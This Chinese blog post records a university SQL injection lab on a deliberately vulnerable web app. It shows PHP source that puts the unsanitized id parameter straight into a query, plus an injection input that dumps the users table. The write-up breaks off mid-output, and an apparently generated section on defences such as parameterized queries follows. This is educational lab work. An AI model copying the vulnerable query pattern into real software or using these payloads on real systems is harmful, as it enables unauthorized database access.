SQL注入实验

本文详细记录了一次SQL注入实验,从安全等级1到5逐步破解的过程,包括注入方法和原理分析,展示了如何利用布尔连接符、宽字符注入等技巧绕过防护。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

信息安全实验 SQL Injection


一.实验内容

1.Finish all six challenge on the website,or give the reason why the protection is unbreakable(need an experiment report ).

2(Extended work).Tell me why [input = a’ or ‘1=1’ or ‘1=1] doesn’t work on the login website in your experiment report.

二.实验过程

  • 登陆实验网页:http://202.38.79.49:8888/login.php
    登陆界面如下:
    p1
  • 尝试输入默认用户名和用户密码:
    Username: admin
    Password: admin
  • 成功登入系统!系统界面如下:
    p2
    1.设置安全等级为1:Security Level = 1.
    注入界面如下:
    p3
  • 点击右下角的View Source,查看PHP连接后台数据库的源代码:
<?php     

if(isset($_GET['Submit'])){ 

    // Retrieve data 

    $id = $_GET['id']; 

    $getid = "SELECT first_name, last_name FROM users WHERE user_id = $id"; 
    $result = mysql_query($getid) or die('<pre>' . mysql_error() . '</pre>' ); 

    $num = mysql_numrows($result); 

    $i = 0; 

    while ($i < $num) { 

        $first = mysql_result($result,$i,"first_name"); 
        $last = mysql_result($result,$i,"last_name"); 

        echo '<pre>'; 
        echo 'ID: ' . $id . '<br>First name: ' . $first . '<br>Surname: ' . $last; 
        echo '</pre>'; 

        $i++; 
    } 
} 
?>
  • 根据以上代码可知,可以利用$id变量的漏洞进行sql注入,向User ID文本框中输入查询字符串1=1 or 1=1,URL网址变成了http://202.38.79.49:8888/vulnerabilities/sqli/?id=1=1+or+1=1&Submit=Submit,获得如下数据库信息:
ID: 1=1 or 1=1
First name: admin
Surname: admin

ID: 1=1 or 1=1
First name: Gordon
Surname: Brown

ID: 1=1 or 1=1
First name: Hack
Surname: Me

ID: 1=1 or 1=1
First name: Pablo
Surname: Picasso

ID:
### SQL 注入实验教程与防御方法 #### 实验教程 SQL注入实验旨在帮助学习者了解SQL注入攻击的工作原理以及如何利用工具检测系统中的漏洞。通过此实验,可以掌握常用的端口和漏洞扫描工具,并提升对SQL注入漏洞危害的认识[^1]。 以下是SQL注入实验的核心内容: - **目标检测**:使用端口和漏洞扫描工具(如Nmap、OpenVAS等)对目标系统进行扫描,发现开放的服务和可能存在的漏洞。 - **SQL注入测试**:尝试构造恶意的SQL语句,以验证目标系统是否存在SQL注入漏洞。例如,通过输入单引号 `'` 或其他特殊字符来观察系统的响应行为。 - **分析结果**:记录并分析实验过程中发现的漏洞,明确其成因及潜在危害。 #### 防御方法 为了有效防御SQL注入攻击,可以从以下几个方面入手: 1. **参数化查询** 使用参数化查询或预编译语句,确保用户输入的内容不会被直接解析为SQL代码。例如,在Python中可以使用以下代码实现安全查询: ```python import sqlite3 conn = sqlite3.connect('example.db') cursor = conn.cursor() username = "admin" password = "password123" # 参数化查询 cursor.execute("SELECT * FROM users WHERE username=? AND password=?", (username, password)) results = cursor.fetchall() ``` 2. **输入验证** 对用户输入的数据进行严格的验证和过滤,确保只允许合法的输入。例如,如果应用程序只需要用户输入数字,可以使用以下代码进行白名单过滤[^3]: ```python if not username.isdigit(): raise ValueError('Invalid username') ``` 3. **最小权限原则** 确保数据库用户的权限设置合理,仅授予其完成任务所需的最低权限。例如,避免使用具有管理员权限的账户连接数据库。 4. **空格绕过防御** 在某些情况下,攻击者可能通过替换空格来绕过简单的过滤规则。可以通过正则表达式或其他方法检测并阻止这些变种输入[^2]。 5. **错误信息控制** 避免在生产环境中显示详细的错误信息,防止攻击者利用这些信息推测数据库结构。 6. **定期更新与审计** 定期更新数据库管理系统及相关软件版本,修补已知漏洞。同时,对应用程序和数据库进行安全审计,及时发现并修复潜在问题。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值